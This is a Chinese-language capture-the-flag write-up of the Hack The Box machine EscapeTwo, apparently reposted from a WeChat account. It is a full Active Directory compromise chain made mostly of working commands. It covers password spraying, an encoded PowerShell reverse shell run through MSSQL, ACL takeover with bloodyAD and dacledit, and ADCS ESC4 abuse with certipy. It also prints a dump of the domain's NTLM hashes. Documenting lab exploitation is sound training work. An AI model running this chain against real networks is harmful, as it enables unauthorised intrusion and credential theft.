HTB-EscapeTwo

admin

138633
文章

114
评论

2025年1月13日19:18:37评论930 views字数 3284阅读10分56秒阅读模式

条件：rose / KxEPkKe6R8su

扫描靶机

跑出几个日常的win端口，先试试smb

使用smbmap看看文件夹的权限

smbmap -u rose -p 'KxEPkKe6R8su' -H sequel.htb

直接登录到Users里面

Users里面没东西，看到开头第一个有个Accounting Department，登录进去

看到有两个表格文件，将其下载下来

account那个表格有用户信息

First Name	Last Name	Email	Username	Password
Angela	Martin	angela@sequel.htb	angela	0fwz7Q4mSpurIt99
Oscar	Martinez	[email protected]	oscar	86LxLBMgEWaKUnBG
Kevin	Malone	[email protected]	kevin	Md9Wlq1E5bZnVDVo
NULL	NULL	[email protected]	sa	MSSQLP@ssw0rd!

得知了这些密码用户，用户应该还有，有个135端口，登录rpcclient看看

拿到用户名，收集起来，然后密码喷洒

winrm没一个密码匹配，刚刚看到表格有mssql，那就跑一下mssql，匹配了一个账号，后面添加一个--local-auth参数执行命令

netexec mssql sequel.htb -u users.txt -p pass.txt--local-auth--continue-on-success

后面添加-x参数，执行命令

netexec mssql sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth -x'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAb...............'

成功反弹，然后拿一个内网环境

查看一下内网环境

[email protected] 用户指向 [email protected]，并且带有 WriteOwner 属性，意味着 RYAN 用户对 CA_SVC 用户的对象具有“写所有者”权限

https://youtu.be/fqYoOoghqdE

在C:SQL2019ExpressAdv_ENU里面的sql-Configuration.INI里面有个密码，保存下来，然后喷洒

直接枚举一下winrm

成功枚举到了账号：ryan:WqSZAF6CysDQbGb3，直接登录winrm

evil-winrm -i sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'

成功的拿到了user flag，因为找到了密码，将ryan设置到ca，根据关系直接修改ca密码

修改成功，尝试登录一下

给我干蒙了，换一种方式，利用bloodyAD设置组

python3 bloodyAD.py --host DC01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'set owner ca_svc ryan

成功设置，然后利用dacledit工具修改ACL

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc'''sequel.htb'/'ryan':'WqSZAF6CysDQbGb3''

成功设置，并且导出bak文件，然后使用certipy工具尝试绕过

certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 'DC01.sequel.htb' -ns 10.10.11.51 -target DC01.sequel.htb -account ca_svc

成功拿到了nt hash：8034586795ebaf0427cc3417ebea341c

竟然可以破解出来，，，

然后等不进去，刚刚生成了ca_svc.ccache，导入，然后继续利用certipy工具

export KRB5CCNAME=ca_svc.ccachecertipy-ad find -scheme ldap -k -debug -target DC01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

可以得知有个ADCS漏洞是esc4，可以利用

certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51 -debug

然后利用certi工具生成Kerberos 身份验证模板，然后利用该模板得到admin的hash，速度要快，因为nt hash是会更新的

certipy-ad req -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn [email protected] -ns 10.10.11.51 -dns 10.10.11.51 -debug

成功生成pfx文件，直接导入，拿到admin的nt

certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

成功拿到了root flag

impacket-psexec sequel.htb/Administrator@DC01.sequel.htb -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::

原文始发于微信公众号（Jiyou too beautiful）：HTB-EscapeTwo

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB-EscapeTwo

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论

在线咨询

微信